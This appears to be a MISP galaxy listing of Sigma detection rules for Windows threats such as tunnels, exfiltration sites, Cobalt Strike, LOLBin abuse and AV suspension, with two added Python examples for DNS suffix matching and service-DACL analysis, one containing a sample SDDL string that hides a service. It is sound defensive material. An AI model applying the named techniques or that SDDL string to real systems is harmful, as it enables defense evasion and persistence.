To see the related clusters, click here.

Access To .Reg/.Hive Files By Uncommon Application

Detects file access requests to files ending with either the ".hive" or ".reg" extension, usually associated with Windows Registry backups.

Internal MISP references

UUID 337a31c6-46c4-46be-886a-260d7aa78cac which can be used as unique global reference for Access To .Reg/.Hive Files By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/09/15
falsepositive ['Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required.']
filename file_access_win_reg_and_hive_access.yml
level low
logsource.category file_access
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Unusual File Modification by dns.exe

Detects an unexpected file being modified by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

Internal MISP references

UUID 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 which can be used as unique global reference for Unusual File Modification by dns.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename file_change_win_unusual_modification_by_dns_exe.yml
level high
logsource.category file_change
logsource.product windows
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

File Creation Date Changed to Another Year

Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.

Internal MISP references

UUID 558eebe5-f2ba-4104-b339-36f7902bcc1a which can be used as unique global reference for File Creation Date Changed to Another Year in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Changes made to or by the local NTP service']
filename file_change_win_2022_timestomping.yml
level high
logsource.category file_change
logsource.product windows
tags ['attack.t1070.006', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

DNS Query To Remote Access Software Domain From Non-Browser App

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 4d07b1f4-cb00-4470-b9f8-b0191d48ff52 which can be used as unique global reference for DNS Query To Remote Access Software Domain From Non-Browser App in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Connor Martin
creation_date 2022/07/11
falsepositive ['Likely with other browser software. Apply additional filters for any other browsers you might use.']
filename dns_query_win_remote_access_software_domains_non_browsers.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

DNS HybridConnectionManager Service Bus

Detects Azure Hybrid Connection Manager services querying the Azure service bus service

Internal MISP references

UUID 7bd3902d-8b8b-4dd4-838a-c6862d40150d which can be used as unique global reference for DNS HybridConnectionManager Service Bus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021/04/12
falsepositive ['Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service']
filename dns_query_win_hybridconnectionmgr_servicebus.yml
level high
logsource.category dns_query
logsource.product windows
tags ['attack.persistence', 'attack.t1554']
Related clusters

To see the related clusters, click here.

Suspicious DNS Query for IP Lookup Service APIs

Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non-browser process.

Internal MISP references

UUID ec82e2a5-81ea-4211-a1f8-37a0286df2c2 which can be used as unique global reference for Suspicious DNS Query for IP Lookup Service APIs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Brandon George (blog post), Thomas Patzke
creation_date 2021/07/08
falsepositive ['Legitimate usage of IP lookup services such as ipify API']
filename dns_query_win_susp_external_ip_lookup.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1590']
Related clusters

To see the related clusters, click here.

DNS Query To Visual Studio Code Tunnels Domain

Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID b3e6418f-7c7a-4fad-993a-93b65027a9f1 which can be used as unique global reference for DNS Query To Visual Studio Code Tunnels Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author citron_ninja
creation_date 2023/10/25
falsepositive ['Legitimate use of Visual Studio Code tunnel will also trigger this.']
filename dns_query_win_vscode_tunnel_communication.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

DNS Query for Anonfiles.com Domain - Sysmon

Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes

Internal MISP references

UUID 065cceea-77ec-4030-9052-fc0affea7110 which can be used as unique global reference for DNS Query for Anonfiles.com Domain - Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/07/15
falsepositive ['Rare legitimate access to anonfiles.com']
filename dns_query_win_anonymfiles_com.yml
level high
logsource.category dns_query
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

DNS Server Discovery Via LDAP Query

Detects DNS server discovery via LDAP query requests from uncommon applications

Internal MISP references

UUID a21bcd7e-38ec-49ad-b69a-9ea17e69509e which can be used as unique global reference for DNS Server Discovery Via LDAP Query in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/20
falsepositive ['Likely']
filename dns_query_win_dns_server_discovery_via_ldap_query.yml
level low
logsource.category dns_query
logsource.product windows
tags ['attack.discovery', 'attack.t1482']
Related clusters

To see the related clusters, click here.

TeamViewer Domain Query By Non-TeamViewer Application

Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)

Internal MISP references

UUID 778ba9a8-45e4-4b80-8e3e-34a419f0b85e which can be used as unique global reference for TeamViewer Domain Query By Non-TeamViewer Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/30
falsepositive ['Unknown binary names of TeamViewer', 'Depending on the environment the rule might require some initial tuning before usage to avoid FP with third party applications']
filename dns_query_win_teamviewer_domain_query_by_uncommon_app.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

DNS Query To MEGA Hosting Website

Detects DNS queries for subdomains related to the MEGA file sharing website

Internal MISP references

UUID 613c03ba-0779-4a53-8a1f-47f914a4ded3 which can be used as unique global reference for DNS Query To MEGA Hosting Website in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aaron Greetham (@beardofbinary) - NCC Group
creation_date 2021/05/26
falsepositive ['Legitimate DNS queries and usage of Mega']
filename dns_query_win_mega_nz.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

DNS Query To Ufile.io

Detects DNS queries to "ufile.io", which has been seen abused by malware and threat actors as a method for data exfiltration

Internal MISP references

UUID 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b which can be used as unique global reference for DNS Query To Ufile.io in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author yatinwad, TheDFIRReport
creation_date 2022/06/23
falsepositive ['DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take']
filename dns_query_win_ufile_io_query.yml
level low
logsource.category dns_query
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Suspicious Cobalt Strike DNS Beaconing - Sysmon

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

Internal MISP references

UUID f356a9c4-effd-4608-bbf8-408afd5cd006 which can be used as unique global reference for Suspicious Cobalt Strike DNS Beaconing - Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/09
falsepositive ['Unknown']
filename dns_query_win_mal_cobaltstrike.yml
level critical
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

AppX Package Installation Attempts Via AppInstaller.EXE

Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL

Internal MISP references

UUID 7cff77e1-9663-46a3-8260-17f2e1aa9d0a which can be used as unique global reference for AppX Package Installation Attempts Via AppInstaller.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/24
falsepositive ['Unknown']
filename dns_query_win_appinstaller.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Cloudflared Tunnels Related DNS Requests

Detects DNS query requests to Cloudflared tunnels domains.

Internal MISP references

UUID a1d9eec5-33b2-4177-8d24-27fe754d0812 which can be used as unique global reference for Cloudflared Tunnels Related DNS Requests in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/20
falsepositive ['Legitimate use of cloudflare tunnels will also trigger this.']
filename dns_query_win_cloudflared_communication.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

DNS Query Request By Regsvr32.EXE

Detects DNS queries initiated by "Regsvr32.exe"

Internal MISP references

UUID 36e037c4-c228-4866-b6a3-48eb292b9955 which can be used as unique global reference for DNS Query Request By Regsvr32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dmitriy Lifanov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename dns_query_win_regsvr32_dns_query.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.execution', 'attack.t1559.001', 'attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

DNS Query Request To OneLaunch Update Service

Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.

Internal MISP references

UUID df68f791-ad95-447f-a271-640a0dab9cf8 which can be used as unique global reference for DNS Query Request To OneLaunch Update Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels
creation_date 2024/02/26
falsepositive ['Unlikely']
filename dns_query_win_onelaunch_update_service.yml
level low
logsource.category dns_query
logsource.product windows
tags ['attack.collection', 'attack.t1056']
Related clusters

To see the related clusters, click here.

DNS Query Tor .Onion Address - Sysmon

Detects DNS queries to an ".onion" address related to Tor routing networks

Internal MISP references

UUID b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 which can be used as unique global reference for DNS Query Tor .Onion Address - Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/20
falsepositive ['Unknown']
filename dns_query_win_tor_onion_domain_query.yml
level high
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.003']
Related clusters

To see the related clusters, click here.

DNS Query To Devtunnels Domain

Detects DNS query requests to Devtunnels domains. Attackers can abuse this feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b which can be used as unique global reference for DNS Query To Devtunnels Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author citron_ninja
creation_date 2023/10/25
falsepositive ['Legitimate use of Devtunnels will also trigger this.']
filename dns_query_win_devtunnels_communication.yml
level medium
logsource.category dns_query
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.
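The three DNS rules above (Cloudflared tunnels, Tor .onion, Devtunnels) all reduce to matching a query name against a set of domain suffixes. The following is an added example (not code from the Sigma project or the MISP galaxy) that runs such a match over constructed Sysmon Event ID 22-style records. The indicator lists are assumptions made for the example and are not copied from the rule files; the point it makes is that the comparison must be done label by label, because a substring test matches `notargotunnel.com` and `onion.example.com` while missing nothing that a label-wise suffix test would catch.

```python
from dataclasses import dataclass

# Assumed indicator lists for this example (not taken from the rule files).
# A suffix entry matches the name itself and any subdomain of it.
SUFFIX_INDICATORS = {
    "Cloudflared Tunnels Related DNS Requests": ("argotunnel.com", "cftunnel.com", "trycloudflare.com"),
    "DNS Query To Devtunnels Domain": ("devtunnels.ms",),
    "DNS Query Tor .Onion Address - Sysmon": ("onion",),
}


@dataclass(frozen=True)
class DnsQueryEvent:
    """Shape of a Sysmon Event ID 22 (DnsQuery) record, reduced to two fields."""
    image: str       # Image: process that issued the query
    query_name: str  # QueryName: the name looked up


def _labels(name: str) -> list[str]:
    """Split a DNS name into lowercase labels, ignoring a trailing dot."""
    return [label for label in name.lower().rstrip(".").split(".") if label]


def matches_suffix(query_name: str, suffix: str) -> bool:
    """True if query_name equals suffix or is a subdomain of it (label-wise).

    'notargotunnel.com' must not match 'argotunnel.com', and
    'onion.example.com' must not match 'onion'; a plain substring test
    would get both wrong.
    """
    q, s = _labels(query_name), _labels(suffix)
    return len(q) >= len(s) and q[-len(s):] == s


def classify(event: DnsQueryEvent) -> list[str]:
    """Return the titles of every rule whose indicators the query matches."""
    return [
        title
        for title, suffixes in SUFFIX_INDICATORS.items()
        if any(matches_suffix(event.query_name, s) for s in suffixes)
    ]


def scan(events: list[DnsQueryEvent]) -> list[tuple[str, str, list[str]]]:
    """Return (image, query_name, matched rule titles) for events that hit."""
    out = []
    for ev in events:
        hits = classify(ev)
        if hits:
            out.append((ev.image, ev.query_name, hits))
    return out


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    DnsQueryEvent(r"C:\Users\bob\AppData\Local\Temp\cloudflared.exe", "protocol-v2.argotunnel.com"),
    DnsQueryEvent(r"C:\Windows\System32\svchost.exe", "abc123-8080.euw.devtunnels.ms"),
    DnsQueryEvent(r"C:\Users\bob\Downloads\client.exe", "expyuzz4wqqyqhjn.onion"),
    DnsQueryEvent(r"C:\Program Files\Browser\browser.exe", "onion.example.com"),
    DnsQueryEvent(r"C:\Program Files\Browser\browser.exe", "notargotunnel.com"),
    DnsQueryEvent(r"C:\Windows\System32\svchost.exe", "www.example.com."),
]

if __name__ == "__main__":
    for image, name, hits in scan(SAMPLE_EVENTS):
        print(f"{name:40} {hits}  ({image})")
```

Two triage notes follow from the rule descriptions: legitimate developer use of Cloudflared and Devtunnels will produce the same queries, so the issuing Image (a binary under Temp or Downloads versus an installed IDE) is the first thing to look at; and a `.onion` name reaching the system resolver at all means a Tor client is not resolving through Tor, which is itself worth a look regardless of intent.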

New DLL Registered Via Odbcconf.EXE

Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.

Internal MISP references

UUID 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 which can be used as unique global reference for New DLL Registered Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.']
filename proc_creation_win_odbcconf_register_dll_regsvr.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Webshell Hacking Activity Patterns

Detects parent/child process patterns seen in cases where a web shell is used to perform credential dumping or exfiltration on a compromised system

Internal MISP references

UUID 4ebc877f-4612-45cb-b3a5-8e3834db36c9 which can be used as unique global reference for Webshell Hacking Activity Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/17
falsepositive ['Unlikely']
filename proc_creation_win_webshell_hacking.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003', 'attack.t1018', 'attack.t1033', 'attack.t1087']
Related clusters

To see the related clusters, click here.

PowerShell Execution With Potential Decryption Capabilities

Detects PowerShell commands that decrypt an ".LNK" file to drop the next stage of the malware.

Internal MISP references

UUID 434c08ba-8406-4d15-8b24-782cb071a691 which can be used as unique global reference for PowerShell Execution With Potential Decryption Capabilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/30
falsepositive ['Unlikely']
filename proc_creation_win_powershell_decrypt_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

New Generic Credentials Added Via Cmdkey.EXE

Detects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via command line interface.

Internal MISP references

UUID b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 which can be used as unique global reference for New Generic Credentials Added Via Cmdkey.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/03
falsepositive ['Legitimate usage for administration purposes']
filename proc_creation_win_cmdkey_adding_generic_creds.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.005']
Related clusters

To see the related clusters, click here.

Add SafeBoot Keys Via Reg Utility

Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attackers to allow ransomware to work in safe mode, as some security products do not

Internal MISP references

UUID d7662ff6-9e97-4596-a61d-9839e32dee8d which can be used as unique global reference for Add SafeBoot Keys Via Reg Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/02
falsepositive ['Unlikely']
filename proc_creation_win_reg_add_safeboot.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious DLL Loaded via CertOC.EXE

Detects the use of "CertOC.exe" with the "-LoadDLL" argument to load a DLL from a potentially suspicious location.

Internal MISP references

UUID 84232095-ecca-4015-b0d7-7726507ee793 which can be used as unique global reference for Suspicious DLL Loaded via CertOC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename proc_creation_win_certoc_load_dll_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Service DACL Modification Via Set-Service Cmdlet

Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" parameter (only available with PowerShell 7) that can be used to hide services or make them unstoppable

Internal MISP references

UUID a95b9b42-1308-4735-a1af-abb1c5e6f5ac which can be used as unique global reference for Suspicious Service DACL Modification Via Set-Service Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/18
falsepositive ['Unknown']
filename proc_creation_win_powershell_service_dacl_modification_set_service.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.
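The rule above fires on the command line; what the SDDL string actually does to the service is the next question in triage. The following is an added example (not code from the Sigma project or the MISP galaxy) that parses the DACL part of a service SDDL string, such as one passed to Set-Service -SecurityDescriptorSddl or sc.exe sdset, and reports deny ACEs that hide the service (deny SERVICE_QUERY_STATUS) or make it unstoppable (deny SERVICE_STOP). The mapping of the generic two-letter SDDL right codes to service-specific rights follows the Windows service security documentation; the sample SDDL strings are constructed for the example.

```python
import re

# Generic SDDL right codes as interpreted for service objects. The two-letter
# codes are generic; the service-specific meaning is what matters when reading
# a service DACL (mapping per the Windows service security documentation).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}

# Well-known SID abbreviations that cover broad groups of principals.
BROAD_SIDS = {
    "WD": "Everyone", "IU": "Interactive users", "SU": "Service logon users",
    "AU": "Authenticated users", "BU": "Builtin Users", "BA": "Builtin Administrators",
}

# Rights whose denial changes how the service shows up or can be controlled.
_DENY_EFFECTS = {
    "LC": "service hidden from sc query / services.msc / Get-Service",
    "WP": "service cannot be stopped",
    "DC": "service configuration cannot be changed",
    "SD": "service cannot be deleted",
}

# D: section: optional DACL flags (P, AI, AR) followed by ACE strings in parentheses.
_DACL = re.compile(r"D:(?:P|AI|AR)*((?:\([^)]*\))*)")
_ACE = re.compile(r"\(([^)]*)\)")


def parse_sddl_dacl(sddl):
    """Return the ACEs of the D: section as dicts (type, flags, rights, sid)."""
    m = _DACL.search(sddl)
    if not m:
        raise ValueError("no DACL (D:) section in SDDL string")
    aces = []
    for body in _ACE.findall(m.group(1)):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, flags, rights, _obj, _inherit_obj, sid = fields
        if rights.startswith("0x"):
            codes = [rights]  # numeric access mask, left undecoded here
        else:
            codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "flags": flags, "rights": codes, "sid": sid})
    return aces


def service_dacl_findings(sddl):
    """Return (sid, right code, effect) for each deny ACE that hides or locks the service."""
    findings = []
    for ace in parse_sddl_dacl(sddl):
        if ace["type"] != "D":
            continue
        for code in ace["rights"]:
            if code in _DENY_EFFECTS:
                who = BROAD_SIDS.get(ace["sid"], ace["sid"])
                findings.append((ace["sid"], code,
                                 f"deny {SERVICE_RIGHTS[code]} to {who}: {_DENY_EFFECTS[code]}"))
    return findings


# Constructed samples. DEFAULT_LIKE resembles a stock service security descriptor;
# HIDING denies query/stop/reconfigure/delete to interactive users, service
# accounts and administrators, the pattern used to make a service invisible and unstoppable.
DEFAULT_LIKE = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
HIDING = "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"

if __name__ == "__main__":
    for name, sddl in (("default-like", DEFAULT_LIKE), ("hiding", HIDING)):
        print(name)
        for _sid, _code, effect in service_dacl_findings(sddl):
            print("  ", effect)
```

A deny ACE aimed at a single domain SID is reported with that SID verbatim, so the reviewer can tell a targeted lockout from the broad IU/SU/BA pattern; a service whose DACL denies LC to Builtin Administrators is one that even an admin console will not list, which is the "hide" effect the rule description refers to.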

Remote Access Tool - ScreenConnect Installation Execution

Detects ScreenConnect program starts that establish a remote access to a system.

Internal MISP references

UUID 75bfe6e6-cd8e-429e-91d3-03921e1d7962 which can be used as unique global reference for Remote Access Tool - ScreenConnect Installation Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/02/11
falsepositive ['Legitimate use by administrative staff']
filename proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

CobaltStrike Load by Rundll32

Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line.

Internal MISP references

UUID ae9c6a7c-9521-42a6-915e-5aaa8689d529 which can be used as unique global reference for CobaltStrike Load by Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Wojciech Lesicki
creation_date 2021/06/01
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Sysinternals PsSuspend Suspicious Execution

Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses

Internal MISP references

UUID 4beb6ae0-f85b-41e2-8f18-8668abc8af78 which can be used as unique global reference for Sysinternals PsSuspend Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/23
falsepositive ['Unlikely']
filename proc_creation_win_sysinternals_pssuspend_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious Execution of InstallUtil Without Log

Detects use of the .NET "InstallUtil.exe" utility with the "/logfile=" and "/LogToConsole=false" options, which execute an image without writing an installation log

Internal MISP references

UUID d042284c-a296-4988-9be5-f424fadcc28c which can be used as unique global reference for Suspicious Execution of InstallUtil Without Log in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/23
falsepositive ['Unknown']
filename proc_creation_win_instalutil_no_log_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential Obfuscated Ordinal Call Via Rundll32

Detects execution of "rundll32" with potential obfuscated ordinal calls

Internal MISP references

UUID 43fa5350-db63-4b8f-9a01-789a427074e1 which can be used as unique global reference for Potential Obfuscated Ordinal Call Via Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/17
falsepositive ['Unknown']
filename proc_creation_win_rundll32_obfuscated_ordinal_call.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Renamed AdFind Execution

Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain.

Internal MISP references

UUID df55196f-f105-44d3-a675-e9dfb6cc2f2b which can be used as unique global reference for Renamed AdFind Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/21
falsepositive ['Unknown']
filename proc_creation_win_renamed_adfind.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1018', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.002']
Related clusters

To see the related clusters, click here.

WhoAmI as Parameter

Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)

Internal MISP references

UUID e9142d84-fbe0-401d-ac50-3e519fb00c89 which can be used as unique global reference for WhoAmI as Parameter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/29
falsepositive ['Unknown']
filename proc_creation_win_susp_whoami_as_param.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Unusual Parent Process For Cmd.EXE

Detects suspicious parent processes for cmd.exe

Internal MISP references

UUID 4b991083-3d0e-44ce-8fc4-b254025d8d4b which can be used as unique global reference for Unusual Parent Process For Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/21
falsepositive ['Unknown']
filename proc_creation_win_cmd_unusual_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential Meterpreter/CobaltStrike Activity

Detects use of the Meterpreter/Cobalt Strike "getsystem" command by detecting the specific service it starts

Internal MISP references

UUID 15619216-e993-4721-b590-4c520615a67d which can be used as unique global reference for Potential Meterpreter/CobaltStrike Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Ecco, Florian Roth
creation_date 2019/10/26
falsepositive ['Commandlines containing components like cmd accidentally', 'Jobs and services started with cmd']
filename proc_creation_win_hktl_meterpreter_getsystem.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1134.001', 'attack.t1134.002']
Related clusters

To see the related clusters, click here.

Remote Access Tool - Anydesk Execution From Suspicious Folder

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 065b00ca-5d5c-4557-ac95-64a6d0b64d86 which can be used as unique global reference for Remote Access Tool - Anydesk Execution From Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/20
falsepositive ['Legitimate use of AnyDesk from a non-standard folder']
